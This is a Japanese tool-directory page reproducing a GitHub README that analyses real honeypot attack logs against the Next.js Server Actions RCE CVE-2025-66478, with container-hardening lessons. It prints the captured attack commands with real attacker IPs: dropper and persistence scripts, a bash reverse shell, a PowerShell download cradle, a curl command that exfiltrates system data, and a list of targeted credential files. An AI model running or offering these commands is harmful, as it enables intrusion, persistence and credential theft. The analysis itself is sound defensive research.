Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-66478 — CVE-2025-66478(Next.js Server Actions RCE)の実世界の攻撃ログ分析。マルウェアサンプル、攻撃者IP追跡、コンテナセキュリティ強化の教訓を含みます。 | Kitploit
ツール/GitHubGitHub/exptechtw/cve-2025-66478
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用フォレンジックマルウェア分析脅威インテリジェンス学習と教育インシデントレスポンス
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

CVE-2025-66478(Next.js Server Actions RCE)の実世界の攻撃ログ分析。マルウェアサンプル、攻撃者IP追跡、コンテナセキュリティ強化の教訓を含みます。

259ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2025-66478 - Next.js Server Actions RCE 脆弱性の実攻撃ログ分析

概要

このプロジェクトは、インターネット上に公開された Next.js 15.1.2 アプリケーション(Docker コンテナ内で実行)で記録された実際の攻撃ログを収集したものです。これらのログは、CVE-2025-66478 の脆弱性が実戦環境で多数の自動化攻撃ツールによってスキャンされ、悪用されている状況を示しています。

記録期間: 2025-12-04 ~ 2025-12-06(約48時間)

環境情報:

  • フレームワーク: Next.js 15.1.2
  • 実行環境: Bun v1.2.20
  • コンテナ: Docker (Alpine Linux)
  • タイムゾーン: Asia/Taipei

攻撃タイプ統計

1. マルウェアのダウンロードと実行(Dropper/Downloader)

攻撃者は、この脆弱性を利用してマルウェアをダウンロードして実行するコマンドを試みました。

攻撃元 IP悪意のあるペイロード URL説明
216.158.232.43http://216.158.232.43:12000/sex.shボットネット/マイニングプログラム
38.207.161.212http://38.207.161.212/agent悪意のあるエージェントプログラム
43.156.63.124http://43.156.63.124/tsdcron バックドアの埋め込み
154.38.121.219res.qiqigece.top/nginx3nginx を装ったマルウェア
47.79.42.91iot.632313373.xyz/nz.shIoT ボットネットスクリプト
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shマイニング/バックドアプログラム
103.135.101.15http://103.135.101.15/wocaosinm.sh悪意のあるスクリプト
38.12.24.231http://38.12.24.231/kworkerkernel worker を装ったマルウェア
128.199.194.97http://128.199.194.97:9001/setup2.sh初期化スクリプト

攻撃コマンド例

root@kitploit:~
# 典型的 dropper 攻擊
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# 植入 cron 持久化後門
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# 複雜的持久化攻擊(嘗試多種下載方式 + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. リバースシェル(Reverse Shell)

攻撃者は、インタラクティブなアクセスを得るためにリバースシェル接続の確立を試みました。

root@kitploit:~
# Bash 反向 shell
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. PowerShell 攻撃(Windows を標的とした誤認)

攻撃者はターゲットが Windows システムであると想定し、PowerShell コマンドの実行を試みました。

root@kitploit:~
# Base64 編碼的惡意 PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# 解碼後:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# 數學計算用於漏洞確認
powershell -c "41*271"      # = 11111(特徵碼確認)
powershell -c "44225*41002" # = 1814113450

4. 情報収集(Information Gathering)

攻撃者は後続の攻撃に備えてシステム情報の収集を試みました。

root@kitploit:~
# 系統資訊收集並外傳
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. 認証情報の窃取(Credential Harvesting)

攻撃者はさまざまな機密ファイルや認証情報の読み取りを試みました。

読み取りが試みられた機密パス

6. 環境変数の漏えい

この脆弱性を介して外部に漏えいしたコンテナ環境変数:

root@kitploit:~
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. DNS 外部送信(DNS Exfiltration)

攻撃者は DNS クエリを使用して、データの外部送信や脆弱性の確認を行いました:

root@kitploit:~
ping 5a58e4a0.log.dnslog.pp.ua.

攻撃失敗の原因

ほとんどの攻撃が失敗したのは、Alpine Linux コンテナの最小限の特性によるものです:

欠落しているツール影響
curl悪意のあるペイロードをダウンロードできない
bashbash 固有の構文(リバースシェルなど)を実行できない
powershellWindows 攻撃が無効

wget は利用可能ですが、一部の悪意のあるスクリプトは内部で依然として curl または bash に依存しているため、実行に失敗します。


Base64 デコード例

ログには多数の Base64 エンコードデータが含まれており、以下はその一部のデコード結果です:

システム情報の漏えい

root@kitploit:~
# digest: 'cm9vdAo='
解碼: root

# digest: 'dGVzdAo='
解碼: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
解碼: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
解碼: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

ディレクトリリストの漏えい

root@kitploit:~
# /tmp 目錄內容
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

解碼:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

攻撃元 IP 統計

以下は、記録された攻撃元 IP アドレスです:


脆弱性の悪用手法(Attack Vectors)

Server Action の呼び出し

攻撃者は存在しない Server Action の呼び出しを試みました:

root@kitploit:~
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"

エラーレスポンスによる情報漏えい

攻撃者はエラーメッセージ内の digest フィールドを利用してデータを外部に漏えいさせました:

root@kitploit:~
Error: x
  digest: 'cm9vdAo='  // Base64 編碼的 'root'

学習のポイント

1. コンテナセキュリティのベストプラクティス

  • 最小限のイメージ: 軽量なベースイメージ(Alpine など)を使用すると、攻撃面を減らすことができます
  • 不要なツールの削除: curl, bash, python など、悪用される可能性のあるツールをインストールしない
  • 読み取り専用ファイルシステム: --read-only でコンテナを実行する
  • 非 root ユーザー: 非特権ユーザーとしてアプリケーションを実行する

2. 脆弱性の修正

  • Next.js を修正済みバージョンにアップグレードする
  • Server Action への入力を検証する
  • WAF ルールを導入して不審なリクエストをフィルタリングする

3. 監視と検知

  • 異常な子プロセスの実行を監視する
  • ネットワークへの外部接続要求を監視する
  • 機密ファイルへのアクセス試行を監視する

免責事項

このプロジェクトは、セキュリティ教育および研究目的のみを対象としています。記録された攻撃はすべて、研究用ハニーポットに対する実際の攻撃試行です。この情報を違法な目的で使用しないでください。


マルウェアサンプル

このプロジェクトには、攻撃ログから抽出・ダウンロードされた実際のマルウェアサンプルが含まれています。詳細な分析については、以下を参照してください:

malware_samples/ANALYSIS.md

取得済みサンプル

攻撃手法の概要

  1. nz.sh - 哪吒(NeZha)監視エージェントをインストールし、被害ホストをリモート監視する
  2. tsd.sh + tsd - 多重の永続化メカニズム(cron + systemd + rc.local)を確立する
  3. init.sh + agent - 複数システム、自動再起動、ログ記録をサポートする完全なバックドアフレームワーク

関連リソース

  • Next.js Security Advisories
  • OWASP - Command Injection
  • MITRE ATT&CK - Execution

ライセンス

MIT License

ツールをダウンロード
カテゴリパス
クラウド認証情報/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
SSH キー/root/.ssh/id_rsa, /root/.ssh/config
Git 認証情報/root/.git-credentials, /root/.gitconfig
コンテナ/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
アプリケーション/proc/self/cwd/serviceAccountKey.json(Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
シェル履歴/root/.bash_history, /root/.zsh_history
クラウドツール/root/.ossutilconfig(Alibaba Cloud OSS)
/root/.npmrc
システム設定/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow
pythonPython ダウンローダーを使用できない
IP アドレス国/地域(推測)攻撃タイプ
216.158.232.43アメリカDropper
38.165.44.205アメリカDropper
23.95.44.80アメリカDropper
154.38.121.219香港マルウェア(nginx3)
38.207.161.212アメリカAgent
43.156.63.124中国Cron バックドア
47.79.42.91中国(Alibaba Cloud)IoT ボットネット
47.79.65.237中国(Alibaba Cloud)マイニングプログラム
119.45.243.154中国(Tencent Cloud)マイニングプログラム
144.22.210.54ブラジルDropper
217.60.249.228スウェーデンDropper
154.26.192.32アメリカリバースシェル
156.234.209.103不明PowerShell ペイロード
38.60.212.106アメリカ情報収集
103.135.101.15ベトナムボットネット
128.199.194.97シンガポール(DigitalOcean)セットアップスクリプト
38.12.24.231アメリカ永続化マルウェア
ファイルタイプサイズソース脅威レベル
nz.shシェルスクリプト931 Biot.632313373.xyz中
tsd.shシェルスクリプト1.7 KB43.156.63.124高
tsdELF 64-bit6.8 MB43.156.63.124高
init.shシェルスクリプト6.1 KBAWS S3重大
agentELF 64-bit23.7 MBAWS S3重大
Agtisx.exePE32+ (Windows)24.0 MBAWS S3重大